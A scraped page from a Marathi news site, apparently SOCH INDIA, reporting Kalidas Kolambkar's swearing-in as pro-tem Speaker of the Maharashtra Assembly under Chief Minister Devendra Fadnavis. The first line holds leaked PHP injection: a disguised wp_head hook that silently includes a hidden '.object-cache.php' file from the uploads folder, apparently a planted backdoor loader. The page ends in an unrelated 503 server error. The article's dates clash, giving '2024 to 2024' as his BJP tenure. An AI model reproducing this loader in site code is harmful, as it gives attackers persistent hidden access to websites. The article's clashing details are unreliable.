add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); विधानसभेच्या हंगामी अध्यक्षांनी घेतली शपथ; विशेष अधिवेशनापूर्वीच कालिदास कोळंबकरांना मोठी जबाबदारी – SOCH INDIA
Menu

देश
विधानसभेच्या हंगामी अध्यक्षांनी घेतली शपथ; विशेष अधिवेशनापूर्वीच कालिदास कोळंबकरांना मोठी जबाबदारी

nobanner

राज्याचे 21 वे मुख्यमंत्री म्हणून भाजप नेते देवेंद्र फडणवीस (Devendra Fadnavis) यांनी गुरुवारी सायंकाळी 5 वाजता शपथ घेतली. त्यानंतर, सायंकाळी त्यांनी मंत्रालयात जाऊन पदभार स्वीकारला, तसेच मंत्रिमंडळाची बैठकही घेतली. त्यानंतर, उद्यापासून तीन दिवसीय विशेष अधिवेशन होणार असल्याची माहितीही फडणवीस यांनी दिली होती. त्यानुसार, विधिमंडळाच्या हंगामी अधिवेशनासाठी विधानसभा अध्यक्षांची निवड करण्यात आली आहे. भाजप नेते आणि ज्येष्ठ आमदार कालिदास कोळंबकर (kalidas kolambkar) यांना विधानसभेचं हंगामी अध्यक्षपद देण्यात आलं आहे. राजभवन येथे आज हंगामी अध्यक्षांचा शपथविधी सोहळा संपन्न झाला. त्यामुळे, विधिमंडळाच्या विशेष अधिवेशन काळात त्यांच्या अध्यक्षतेखाली विधानसभेचं कामकाज होणार आहे.

मी कालिदास कोळंबकर विधानसभेच्या हंगामी अध्यक्षपदी शपथ घेतो की… असे म्हणत कालिदास कोळंबकर यांनी राजभवनात विधानमंडळाच्या विशेष अधिवेशनासाठी हंगामी अध्यक्ष म्हणून आज शपथ घेतली. राज्यपाल राधाकृष्णन यांनी कोळंबकर यांना पद व गोपनियतेची शपथ दिली. त्यानंतर, राज्याचे मुख्यमंत्री देवेंद्र फडणवीस यांनीही पुष्पगुच्छ देऊ त्यांचे अभिनंदन केले. तर, विधानपरिषद सभापती निलम गोऱ्हे यांनीही कोळंबकर यांचे अभिनंदन केले. दरम्यान, शनिवार 7 डिसेंबरपासून विधिमंडळाचं तीन दिवसीय विशेष अधिवेशन बोलवण्यात आलं आहे. विधिमंडळ सचिवालयाकडून कर्मचाऱ्यांना याबाबत महत्त्वाच्या सूचना देण्यात आल्या आहेत. विधिमंडळ सचिवालयाकडून सर्व कर्मचाऱ्यांना तयारीसाठी उपस्थित राहण्याच्या सूचना देण्यात आल्या आहेत. या विशेष अधिवेशनात नवनिर्वाचित आमदारांचा शपथविधीचा कार्यक्रम पार पडणार आहे. तर, 9 डिसेंबरला नव्या विधानसभा अध्यक्षाची निवड होणार आहे. आमदारांच्या बहुमताने विधानसभा अध्यक्ष निवड होईल. त्यानंतर, 16 डिसेंबरपूर्वी मंत्रिमंडळाचा विस्तार होणार असल्याचं मुख्यमंत्री देवेंद्र फडणवीस यांनी सांगितलं. त्यामुळे, नव्या सरकारचं कामकाज आता सुरू झालं आहे.

कोण आहेत कालिदास कोळंबकर
कालिदास कोळंबकर हे यंदाच्या निवडणुकीत मुंबईतील वडाळा मतदारसंघातून भाजपच्या चिन्हावर विजयी झाले आहेत. विशेष म्हणजे सगल 9 वेळा आमदार होण्याचा विक्रम त्यांनी स्वत:च्या नावावर केलाय. सन 1990 पासून 2004 पर्यंत त्यांनी शिवसेनेतून विधानसभा निवडणूक लढवली होती. मात्र, 2005 मध्ये माजी मुख्यमंत्री नारायण राणे यांच्यासह त्यानीही शिवसेनेला जय महाराष्ट्र करत काँग्रेसमध्ये प्रवेश केला. मात्र, 2014 मध्ये त्यांनी मोदी लाटेत भाजपात प्रवेश केला. 2024 ते 2024 हा त्यांचा भाजपमधील कालावधी आहे. पण, 1990 पासून 2025 पर्यंत ते सातत्याने विजयी झाल्याने मतदारसंघातील त्यांचा दबदबा दिसून येतो.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.